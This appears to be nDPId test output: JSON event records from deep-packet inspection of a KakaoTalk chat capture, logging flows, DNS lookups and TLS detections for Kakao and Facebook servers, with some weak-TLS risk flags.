00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="}
00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="}
00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="}
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="}
00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="}
00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"thread_ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="}
